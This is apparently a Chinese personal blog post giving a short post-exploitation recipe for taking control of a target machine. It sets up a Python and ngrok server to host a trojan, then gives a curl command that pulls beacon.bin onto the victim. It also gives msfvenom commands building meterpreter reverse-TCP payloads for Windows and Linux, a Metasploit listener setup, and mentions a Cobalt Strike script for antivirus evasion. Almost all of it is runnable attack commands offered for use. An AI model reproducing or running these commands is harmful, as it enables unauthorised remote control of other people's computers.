后渗透1%

发布时间 :
字数:403 阅读 :
  1. 如何控制目标机器
    1. 搭建本地服务器
      1. 用于远程下载木马
      2. Windows/Linux远程下载木马命令
    2. msfvenom制作木马
      1. 生成木马:
    3. MSF攻击
    4. Linux后台运行程序命令
      1. cna检测杀软脚本使用

如何控制目标机器

  • 远程下载木马文件,这就需要一个服务器,通过请求服务器下载木马到目标机器
  • msfvenom制作木马
  • 利用MSF攻击目标,设置监听
  • 目标机器运行木马→MSF获得对方机器的session→控制目标机器

搭建本地服务器

用于远程下载木马

1.本地利用python搭建简单服务器
python -m SimpleHTTPServer 8000

2.使用花生壳,ngrok,sunny_ngrok等内网穿透软件把自己在内网(局域网外无法访问的)的电脑变成外网服务器,可以提供远程下载服务。

3.ngrok启动(Linux下):./ngrok http 8000

  • 8000是本地端口

Windows/Linux远程下载木马命令

curl -o C:\Users\wohcoos\Desktop\beacon.bin http://ip:port/charlotte/beacon.bin

msfvenom制作木马

生成木马:

  • Windows:msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=ip(外网) LPORT=36491 -f raw > /home/kali/

  • Linux:msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=ip(外网) LPORT=36491 -f elf > /home/kali/

MSF攻击

use exploit/multi/handler  

set payload windows/x64/meterpreter/reverse_tcp  

set lhost 192.168.245.128  //这个就是你刚刚网站的填写的IP,内网穿透软件设置映射到本机的ip

set lport 7758  //这个就是刚刚IP后面跟着的端口,内网穿透软件设置映射到本机的port

exploit //运行,开始监听目标运行木马文件获得的session

Linux后台运行程序命令

目的就是方便

  • screen -S name 新建后台程序
  • screen -ls 后台程序清单
  • screen -r 恢复后台程序
  • CTRL+a+d 返回操作界面

cna检测杀软脚本使用

防查杀

命令:AV_Query

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至1694933467@qq.com

©2021-2023 WohCoOs

Built with Hexo and 3-hexo theme